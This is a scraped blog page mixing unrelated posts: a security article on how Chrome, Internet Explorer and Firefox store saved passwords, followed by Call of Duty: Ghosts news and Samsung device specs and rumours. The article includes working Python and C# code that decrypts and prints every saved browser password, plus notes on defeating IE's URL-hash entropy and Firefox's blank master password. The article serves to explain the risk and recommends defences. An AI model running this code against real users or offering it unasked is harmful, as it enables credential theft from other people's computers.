TWO D AND F

lol ...XD

one of the oldest tree

one of the Oldest tree on earth
1500 years old

How Browsers Store Your Passwords

How Browsers Store Your Passwords

Introduction

In a previous post, I introduced a Twitter bot called dumpmon which monitors paste sites for account dumps, configuration files, and other information. Since then, I've been monitoring the information that is detected. While you can expect a follow-up post with more dumpmon-filled data soon, this post is about how browsers store passwords.

I mention dumpmon because I have started to run across quite a few pastes like this that appear to be credential logs from malware on infected computers. It got me thinking - I've always considered it best to not have browsers store passwords directly, but why? How easy can it be for malware to pull these passwords off of infected computers? Since sources are a bit tough to find in one place, I've decided to post the results here, as well as show some simple code to extract passwords from each browser's password manager.

The Browsers

For this post, I'll be analyzing the following browsers on a Windows 8 machine. Here's a table of contents for this post to help you skip to whatever browser you're interested in:

• Chrome 27.0.1453.110
• IE 10
• Firefox 21.0

Logos by Paul Irish

Chrome

Difficulty to obtain passwords: Easy

Let's start with Chrome. Disappointingly, I found Chrome to be the easiest browser to extract passwords from. The encrypted passwords are stored in a sqlite database located at "%APPDATA%\..\Local\Google\Chrome\User Data\Default\Login Data". But how do they get there? And how is it encrypted? I got a majority of information about how passwords are stored in Chrome from this article written over 4 years ago. Since a bit has changed since then, I'll follow the same steps to show you how passwords are handled using snippets from the current Chromium source (or you just skip straight to the decryption).

Encryption and Storing Passwords
When you attempt to log into a website, Chrome first checks to see if it was a successful login:

We can see that if it's a successful login, and you used a new set of credentials that the browser didn't generate, Chrome will display a bar asking if you want your password to be remembered:

To save space, I'm omitting the code that creates the Save Password bar. However, if we click "Save password", the Accept function is called, which in turn calls the "Save" function of Chrome's password manager:

Easy enough. If it's a new login, we need to save it as such:

Again to save space, I've snipped a bit out of this (a check is performed to see if the credentials go to a Google website, etc.). After this function is called, a task is scheduled to perform the AddLoginImpl() function. This is to help keep the UI snappy:

This function attempts to call the AddLogin() function of the login database object, checking to see if it was successful. Here's the function (we're about to see how passwords are stored, I promise!):

Now we're getting somewhere. We create an encrypted string out of our password. I've snipped it out, but below the "sql::Statement" line, a SQL query is performed to store the encrypted data in the Login Data file. The EncryptedString function simply calls the EncryptString16 function on an Encryptor object (this just calls the following function below):

Finally! We can finally see that the password given is encrypted using a call to the Windows API function CryptProtectData. This means that the password is likely to only be recovered by a user with the same logon credential that encrypted the data. This is no problem, since malware is usually executed within the context of a user.

Decrypting the Passwords

Before talking about how to decrypt the passwords stored above, let's first take a look at the Login Data file using a sqlite browser.

Our goal will be to extract the action_url, username_value, and password_value (binary, so the SQLite browser can't display it) fields from this database. To decrypt the password, all we'll need to do is make a call to the Windows API CryptUnprotectData function. Fortunately for us, Python has a great library for making Windows API calls called pywin32.

Let's look at the PoC:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16

from os import getenv import sqlite3 import win32crypt   # Connect to the Database conn = sqlite3.connect(getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Login Data") cursor = conn.cursor() # Get the results cursor.execute('SELECT action_url, username_value, password_value FROM logins') for result in cursor.fetchall(): # Decrypt the Password password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1] if password: print 'Site: ' + result[0] print 'Username: ' + result[1] print 'Password: ' + password

view raw chrome_extract.py This Gist brought to you by GitHub.

And, by running the code, we see we are successful!

While it was a bit involved to find out how the passwords are stored (other dynamic methods could be used, but I figured showing the code would be most thorough), we can see that not much effort was needed to actually decrypt the passwords. The only data that is protected is the password field, and that's only in the context of the current user.
  
Internet Explorer
Difficulty to obtain passwords: Easy/Medium/Hard (Depends on version)

Up until IE10, Internet Explorer's password manager used essentially the same technology as Chrome's, but with some interesting twists. For the sake of completeness, we'll briefly discuss where passwords are stored in IE7-IE9, then we'll discuss the change made in IE10. 

Internet Explorer 7-9

In previous versions of Internet Explorer, passwords were stored in two different places, depending on the type of password.

• Registry (form-based authentication) - Passwords submitted to websites such as Facebook, Gmail, etc.
• Credentials File - HTTP Authentication passwords, as well as network login credentials 

For the sake of this post, we'll discuss credentials from form-based authentication, since these are what an average attacker will likely target. These credentials are stored in the following registry key:

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2

Looking at the values using regedit, we see something similar to the following:

As was the case with Chrome, these credentials are stored using Windows API function CryptProtectData. The difference here is that additional entropy is provided to the function. This entropy, also the registry key, is the SHA1 checksum of the URL (in unicode) of the site for which the credentials are used.

This is beneficial because when a user visits a website IE can quickly determine if credentials are stored for it by hashing the URL, and then using that hash to decrypt the credentials. However, if an attacker doesn't know the URL used, they will have a much harder time decrypting the credentials.

Attackers will often be able to mitigate this protection by simply iterating through a user's Internet history, hashing each URL, and then checking to see if any credentials have been stored for it.

While I won't paste the entire code here, you can find a great example of a full PoC here. For now, let's move on to IE10.

Internet Explorer 10

IE10 changed the way it stores passwords. Now, all autocomplete passwords are stored in the Credential Manager in a location called the "Web Credentials". It looks something like the following:

To my knowledge (I wasn't able to find much information on this), these credential files are stored in %APPDATA%\Local\Microsoft\Vault\[random]. A reference to what these files are, and the format used could be found here.

What I do know is that it wasn't hard to obtain these passwords. In fact, it was extremely easy. For Windows Store apps, Microsoft provided a new Windows runtime for more API access. This runtime provides access to a Windows.Security.Credentials namespace which provides all the functionality we need to enumerate the user's credentials.

In fact, here is a short PoC C# snippet which, when executed in the context of a user, will retrieve all the stored passwords:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33

using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; using Windows.Security.Credentials;   namespace PasswordVaultTest { class Program { static void Main(string[] args) { // Create a handle to the Widnows Password vault Windows.Security.Credentials.PasswordVault vault = new PasswordVault(); // Retrieve all the credentials from the vault IReadOnlyList<PasswordCredential> credentials = vault.RetrieveAll(); // The list returned is an IReadOnlyList, so there is no enumerator. // No problem, we'll just see how many credentials there are and do it the // old fashioned way for (int i = 0; i < credentials.Count; i++) { // Obtain the credential PasswordCredential cred = credentials.ElementAt(i); // "Fill in the password" (I wish I knew more about what this was doing) cred.RetrievePassword(); // Print the result Console.WriteLine(cred.Resource + ':' + cred.UserName + ':' + cred.Password); } Console.ReadKey(); } } }

view raw ie_extract.cs This Gist brought to you by GitHub.

When executing the program, the output will be similar to this:

Note: I removed some sites that I believe came from me telling IE not to record. Other than that, I'm not sure how they got there.

As you can see, it was pretty trivial to extract all the passwords in use from a given user, as long as our program is executing in the context of the user. Moving right along!
  
Firefox
Difficulty to obtain passwords: Medium/Very Hard

Next let's take a look at Firefox, which was tricky. I primarily used these slides (among a multitude of other resources) to find information about where user data is stored.

But first, a little about the crypto behind Firefox's password manager. Mozilla developed a open-source set of libraries called "Network Security Services", or NSS, to provide developers with the ability to create applications that meet a wide variety of security standards. Firefox makes use of an API in this library called the "Secret Decoder Ring", or SDR, to facilitate the encryption and decryption of account credentials. While it may have a "cutesy name", let's see how it's used by Firefox to provide competitive crypto:

When a Firefox profile is first created, a random key called an SDR key and a salt are created and stored in a file called "key3.db". This key and salt are used in the 3DES (DES-EDE-CBC) algorithm to encrypt all usernames and passwords. These encrypted values are then base64-encoded, and stored in a sqlite database called signons.sqlite. Both the "signons.sqlite" and "key3.db" files are located at %APPDATA%/Mozilla/Firefox/Profiles/[random_profile].

So what we need to do is to get the SDR key. As explained here, this key is held in a container called a PKCS#11 software "token". This token is encapsulated inside of a PKCS#11 "slot". Therefore, to decrypt the account credentials, we need to access this slot.

But there's a catch. This SDR key itself is encrypted using the 3DES (DES-EDE-CBC) algorithm. The key to decrypt this value is the hash of what Mozilla calls a "Master Password", paired with another value found in the key3.db file called the "global salt".

Firefox users are able to set a Master Password in the browser's settings. The problem is that many users likely don't know about this feature. As we can see, the entire integrity of a user's account credentials hinges on the complexity of chosen password that's tucked away in the security settings, since this is the only value not known to the attacker. However, it can also been that if a user picks a strong Master Password, it is unlikely that an attacker will be able to recover the stored credentials.

Here's the thing - if a user doesn't set a Master Password, a null one ("") is used. This means that an attacker could extract the global salt, hash it with "", use that to decrypt the SDR key, and then use that to compromise the user's credentials.

Let's see what this might look like:

To get a better picture of what's happening, let's briefly go to the source. The primary function responsible for doing credential decryption is called PK11SDR_Decrypt. While I won't put the whole function here, the following functions are called, respectively:

1. PK11_GetInternalKeySlot() //Gets the internal key slot
2. PK11_Authenticate() //Authenticates to the slot using the given Master Password
3. PK11_FindFixedKey() //Gets the SDR key from the slot
4. pk11_Decrypt() //Decrypts the base64-decoded data using the found SDR key

As for example code to decrypt the passwords, since this process is a bit involved, I won't reinvent the wheel here. However, here are two open-source projects that can do this process for you:

• FireMaster - Brute forces master passwords
• ffpasscracker - I promised you Python, so here's a solution. This uses the libnss.so library as a loaded DLL. To use this on Windows, you can use these cygwin DLL's.

Conclusion

I hope this post has helped clarify how browsers store your passwords, and why in some cases you shouldn't let them. However, it would be unfair to end the post saying that browsers are completely unreliable at storing passwords. For example, in the case of Firefox, if a strong Master Password is chosen, account details are very unlikely to be harvested.

But, if you would like an alternative password manager, LastPass, KeePass, etc. are all great suggestions. You could also implement two-factor authentication using a device such as a YubiKey.

As always, please don't hesitate to let me know if you have any questions or suggestions in the comments below.

CALL OF DUTY : GHOSTS

Call of Duty: Ghosts News, rumours, release date

Call of Duty: Ghosts News

Activision has officially confirmed that its next COD instalment will take the form of Call of Duty: Ghosts. the focus of intense speculation for the past couple of weeks, Activision unveiled Call of Duty: Ghosts with a new teaser trailer and dedicated website last week on May 1.

Originally thought to be called Call of Duty: Modern Warfare 4, Call of Duty: Ghosts is said to be the COD game for "the next generation."

"Everyone was expecting us to make Modern Warfare 4, which would have been the safe thing to do. But we're not resting on our laurels," said Mark Rubin, executive producer of Infinity Ward. "We saw the console transition as the perfect opportunity to start a new chapter for Call of Duty. So we're building a new sub-brand, a new engine, and a lot of new ideas and experiences for our players. We can't wait to share them with our community."

Call of Duty Ghosts: Gameplay trailer coming on Sunday, June 9

The first Call of Duty: Ghosts gameplay trailer will be officially released on Sunday, June 9 ahead of any E3 showing by Microsoft or Sony. Activision is choosing to release the first gameplay trailer prior to the annual E3 gaming conference and will showcase "an exclusive first look at gameplay levels from the title".

Promising some "behind the scenes footage, interviews with the Infinity Ward team and more", the Call of Duty event will start at 11am local time, British COD fans can expect the gameplay footage around 7pm BST.

Activision will serve up the Call of Duty: Ghosts first look during a dedicated webcast, with the trailer available on the official Call of Duty site alongside "additional broadcast outlets", so we're thinking YouTube.

We expect to see a lot more of the upcoming FPS at E3 2013, especially since it was featured in Microsoft's Xbox One E3 trailer released earlier this week.

Call of Duty: Ghosts Features

Call of Duty: Ghosts features showcased during Xbox One reveal
Call of Duty: Ghosts was given its world première during the Xbox One reveal on May 21, revealing more of the game's features. Speaking directly to the Activision developers, Microsoft provided fans of the series with more details on they game.

Featuring “a whole new story with brand new characters in a whole new world”, Activision said it aims to produce a cast of characters that the player can feel more connected to. For this, the developer has brought in the writer of Syriana and Traffic, Stephen Gaghan.

Set ten years after a "massive attack" on the US, you play as a group of special forces soldiers known as The Ghosts. "You are the underdog fighting back against a superior force."

What's a huge new addition to the Call of Duty: Ghosts squad is their new canine companion. The first COD game to feature a dog, the mutt will aid the team by sniffing out explosives and protecting the soldiers in other, as yet undisclosed, ways.



Said to be a key aspect as to how players strategise throughout the game, we can see many a level where the squad will have to protect their new canine buddy.

The new gaming engine used by Call of Duty: Ghosts utilises Pixar's SubD technology to improve the smoothness of graphics, especially noticeable on the weapons at close range notes Activision developers.

Stating that the key word for the new graphics engine is "immersion", the Call of Duty: Ghosts developers say this game will have the best graphical fidelity of any in the series. Characters now automatically leap over any low cover in their way and can intelligently lean in and out of cover. New AI technology also allows for a more responsive environment, including fish that will intuitively move out of your way as you near them.

Also revealing "just two of the new features coming to the next-generation of Call of Duty multiplayer", Activision explains the new dynamic experience and character customisation.

Similar to Battefield 4, Call of Duty: Ghosts multiplayer will introduce a new dynamic experience driven by large scale events like floods and earthquakes, but also by smaller player-driven incidents like buildings collapsing from explosions.




Call of Duty: Ghosts will introduce voice commands via Xbox One Kinect

CEO of Activision Publishing, Eric Hirshberg, has also confirmed in a separate interview that anyone playing the game on the Xbox One will be able to use voice commands to direct their squad.

 “We think the improvements to Kinect really excited us because of the level of responsiveness and detail”, said Hirshberg. “I thought that the demo they did with the voice commands on television, the instant changing between games and music, was really compelling. You’ll see more of this coming from us as we get closer to the launch.”

Call of Duty: Ghost Release Date

Activision has confirmed that a Call of Duty: Ghosts release date is scheduled for November 5, shipping on current generation Xbox 360 and PS3 consoles as well as PS4 and Xbox One.

Fans are so eager to get their hands on the game that just 24 hours after Activision officially unveiled Call of Duty: Ghosts, the game soared straight to the top of the charts for Amazon pre-orders. Six months before the game will ship to consumers, the game is currently occupying the number one and number two spots in the gaming chart for the Xbox 360 and PS3 versions respectively on Amazon UK.

Call of Duty: Ghosts Trailer

Following the release announcement, a 90-second Call of Duty: Ghosts teaser trailer was posted to YouTube, but lacks any gameplay footage and offers no hints about the game's context or plot.

Instead it depicts a host of historical warriors in their traditional 'masks' before focusing on the skull mask worn by Lt. Simon "Ghost" Riley, who is expected to be the game's central character.

The voiceover says: "There are those who wear masks to hide. And those who wear masks to show us what they stand for. To inspire. To unite. To defy. To strike fear in the hearts of their enemies, and hope in the hearts of their followers."

"There are those who wear masks to protect themselves, and those who wear masks to protect us all."

SAMS

SAMSUNG TAB 3.8.0

Samsung Galaxy Tab 3 8.0 T3110 Specification

• Description

• Description
  Samsung GALAXY Tab 3 8.0 tablet is the optimal device for viewing videos, playing enhanced games, and reading e-Books anytime, anywhere. Outstanding slim bezel for effective and maximum screen use makes Samsung’s “reading mode” technology which optimizes the display to deliver perfect illumination and tone for comfortable paperlike readability in a variety of lighting conditions work better on its 8-inch screen. Samsung’s Sound Alive for Audio and Dolby Surround for Video Play maximize every sound allow users to enjoy clearer dialogue, consistent volume levels, and superior audio to further enhance the overall multimedia experience with the new device. Also, the physical keys on the bezel at bottom give users a comfortable smartphone-like experience in navigating

• General

• Style
                                                                                                  Tablet
• Dimensions
                                                                                             209.8 x 123.8 x 7.4 mm
• Weight
                                                                                               314 g (With Battery)
• Battery Type
                                                                                                    Li-Ion 4450 mAh

• Display

• Display Resolution
                                                                                                 1280 x 800 Pixels

• Memory

• Memory InBuilt
                                                                                 16 GB (or) 32 GB (Internal) + 11.26 GB (or)   
                                                                                         26.16 GB (User Memory)  
  
  
• Memory Extended
                                                                                     MicroSD upto 32 GB

• Messaging

• MMS
                                                                                                   No
• Email
                                                                                                  Yes
• Push Mail
                                                                                                       No

• Camera

• Camera
  Yes
• Mega Pixels
  Ext:5.0MP, 2592x1944 Pix; Int:1.3MP, 1280x1024 Pix
• Camera Zoom
  Yes
• Video Capture
  MPEG4, H.263, H.264, WMV, DivX

• Connectivity

• Port
  USB Port 2.0
• Infrared
  No
• A2DP
  No
• Wifi
  Wi-Fi 802.11 a/b/g/n; WiFi Channel Bonding, Direct

• Entertainment

• Music Player
  MP3, OGG, AAC, AAC+, eAAC+, WMA, FLAC
• Loud Speaker
  No

• Technology

• 3G
  No
• OS
  Android OS, v4.2 (Jelly Bean)
• Dual SiM
   No
• QWERTY
  Yes

• Network

• GPS
  A-GPS, Google Maps (Turn-by-turn Navigation), GLONASS

• Others Features

• Special Features
  Samsung Apps, Samsung Hub (Readers Hub, Music Hub, Game Hub, Video Hub, Learning Hub), Samsung Kies, (Samsung Kies Air), (Downloadable via Samsung Apps), Samsung ChatON mobile communication service, Samsung Services: (Reading mode, Story Album, Group Play, S Translator, S Travel, Dual View, Pop up Video, WatchON), Google Mobile Services: Google Search, Gmail, Google Play Store, Google Plus, YouTube, Google Talk, Google Now
   
   

  samsung galaxy tab 3.10.1 and galaxy tab 3.8.0

   
  The detailed specifications of two upcoming Samsung tablets have just leaked. The third generation of the Galaxy Tab mid-range lineup will feature a couple of slates armed with a 10.1" and an 8" display, respectively. Interestingly, the picture that came along with the leak confirms the hardware home button, which is still unusual for Android slates.
  Samsung Galaxy Tab 3 10.1The Samsung Galaxy Tab 3 10.1 will run on Andrdoid 4.1 Jelly Bean and will be powered by a 1.5GHz dual-core CPU and will have 1GB of RAM. That might as well be a typo as the Galaxy Tab 3 8.0 is said to have 2 gigs of operating memory. Unfortunately, earlier reports of a 2560 x 1600 pixel display weren't confirmed and the new rumors point to a resolution of just 1280 x 800 pixels.
  
  The Galaxy Tab 3 10.1 will reportedly have 16GB of internal memory, which will be expandable through the microSD card slot. Connectivity options will include Bluetooth 4.0, Wi-Fi, standard microUSB port and, depending on the version, HSPA or LTE. Power will be supplied by a 7,000 mAh battery, while imaging will be taken care of by a 3MP main camera and a 1.3MP front-facing snapper.
  
  Galaxy Tab 3 8.0
  Moving on to the Samsung Galaxy Tab 3 8.0, we learn that it will feature the same CPU as its bigger brother. The 8" display will have a resolution of 1280 x 800 pixels and will be your window to Android 4.1 Jelly Bean at launch.
  Connectivity options and cameras are the same as on the Galaxy Tab 3 10.1, while the battery has been trimmed down to 4,500 mAh capacity. If the rumors turn out true, the Galaxy Tab 3 8.0 will be impressively slim at 6.95mm, but will weigh 330g - about the same as the Galaxy Note 8.0.

   

SAMAGUNG NEWS

Samsung announces Premiere event on June 20, to launch new Galaxy and Ativ devices

Samsung is going to launch new Galaxy and Ativ devices on June 20 in London, the company informed through its various communication channels. The Korean giant is calling the event, Samsung Premiere 2013.

While the invite teaser doesn't offer much detail barring what looks like a textured back of a phone/ tablet, a laptop lid and perhaps a camera lens, it's worth pointing out that Samsung sells Android smartphones, tablets and cameras under the Galaxy sub-brand, and Windows Phone 8 smartphones and Windows 8 tablets/ hybrids/ PCs under the Ativ sub-brand. So we could see the company unveiling any of those devices. Samsung would also be offering a live-stream of the event on YouTube.

Samsung had recently announced that it would be extending the Ativ branding to include its Windows 8 based PCs.

Among the Galaxy devices, Samsung is expected to launch various niche variants of its flagship smartphone, Galaxy S4. The company is expected to launch a ruggedized version of the phone by the name of Galaxy Active, a compact version - the Galaxy S4 Mini and even a camera-focused variant- the Galaxy Zoom. It's also possible that the company may announce a new tablet under the Galaxy Tab or Galaxy Note series.

It's also interesting to note that Samsung is launching its large screen smartphone, the Galaxy Mega, on Tuesday, in the Indian market. The company is holding an event and has tweeted about the same through the Samsung Mobile India Twitter account.

The Galaxy Mega comes in two screen-size variants- 6.3 and 5.8. The Samsung Galaxy Mega 6.3 sports a 6.3-inch HD display, and features an 8-megapixel rear camera, and a 2-megapixel front facing camera. It is powered by a dual-core processor clocked at 1.7GHz. The Galaxy Mega has 1.5GB of RAM, Bluetooth 4.0, Wi-Fi 802.11 a/b/g/n and A-GPS. The phone comes with a 3,200 mAh battery and runs Android 4.2 Jelly Bean. It will come in 8 and 16GB internal storage capacity variants and will have a microSD card for expanding the memory up to 64GB. Samsung Galaxy Mega 5.8 has a 5.8-inch screen with qHD(540x960 pixels) resolution. It is powered by a 1.4GHz dual-core processor, and features the same camera as that of Galaxy Mega 6.3. The phone has an 8GB internal storage variant. It comes with a 2,600mAh battery.

SAMSUNG UNVEILS THE KING OF CAMERA PHONE

Samsung unveils the king of camera phones – with the stunning 16-megapixel Galaxy S4 Zoom

The Samsung Galaxy S4 Zoom release date has formally pegged as a somewhat vague ‘summer 2013’, but that isn’t stopping a number of retailers letting you register interest in the camera heavy smartphone right now.

 The Samsung Galaxy S4 Zoom marries an Android 4.2-based smartphone with a 16-megapixel camera that uses a 10x zoom lens.

(Credit: Samsung)

Samsung's S4 Galaxy Zoom -- which combines an Android smartphone with a 16-megapixel camera and 10x zoom lens -- is real.

The model isn't likely to appeal to the mainstream smartphone buyer. But in an Android marketcrowded with options, a niche that caters to a particular subset can be a reasonable approach -- especially if that subset is as passionate, enthusiastic, and willing to part with money as photographers often are.

The Korean electronics giant announced the new smartphone Wednesday, the latest in a series of S4-branded phones that began with the Galaxy S4 flagship model, continued with the smaller, cheaper Galaxy S4 Mini, then the rugged Galaxy S4 Active.

Samsung's Galaxy S4 Zoom, the point-and-shoot smartphone 

Scroll Right

• 
• 
• 
• 
• 
• 

The company had dipped its toes in the Android camera waters last year with the $550 Samsung Galaxy Camera, which has an Android interface, a 4.8-inch touch screen, a 21x zoom lens, and mobile-network connectivity. Though its camera is better than what's in the vast majority of smartphones, it's not a real smartphone, even though the full potential of photo and video sharing requires customers to pay for a new monthly data plan.

The Galaxy S4 Zoom is a real smartphone, though -- something to go up against Nokia's 808 Pureview and, more realistically, the Windows Phone-based but still officially only rumoredNokia EOS.

SAMSUNG GALAXY NOTE 3

Samsung Galaxy Note 3 seems to be releasing soon at samsung

The Samsung Galaxy Note 3 has made another possible appearance on Samsung’s website in the form of a model number, SM-N900J, the second time in recent days that the new, rumored smartphone has been thought to have touched down on the company’s website.

Samsung is heavily rumored to be bringing a new Galaxy Note device to shelves sometime later this year and rumors have suggested that that device is the Samsung Galaxy Note 3, a massive 5.9-inch phablet that features a number of upgrades to both hardware and to the device’s software. An announcement isn’t expected until far later this year but already, we’re seeing signs of the Galaxy Note 3′s presence.

Samsung Galaxy Note 3: Release date

The Samsung Galaxy Note 3 has broken cover with a suspected release date of 2013, but when can we expect to see this phablet emerge?

Samsung has said it is switching focus at the beginning of 2013 to concentrate on its OLEDdisplays - in small, medium and large formats. Moving its staff away from LCD and onto OLED development could mean it will be ready for production much sooner than previous rumours.

We think a Q3 2013 release could be on the cards - slightly later than its 2012 Galaxy Note August release date, but developing a 6.3-inch OLED display can't be easy work!

As of early March 2013, the current rumour, which allegedly comes straight from the mouth of a Samsung 'official', says that the Korean phone-maker will launch the Galaxy Note 3 in 'the latter half of the year'. It's worth mentioning that the Galaxy Note 2 emerged at IFA 2012. The annual show takes place in September, which falls in-line neatly with that latter half of 2013 rumour.

Samsung’s Galaxy Note 3 might be arriving earlier than previously expected with new rumours pointing to a mid-June launch.

It was thought the Galaxy Note 3 would arrive at IFA 2013 in Berlin this September, just as the Galaxy Note 2 did at the same event in 2012. However, Samsung’s profile has continually been on the up since then and the Galaxy Note range has proven one of its most popular brands. Viewed in this context a standalone event makes sense.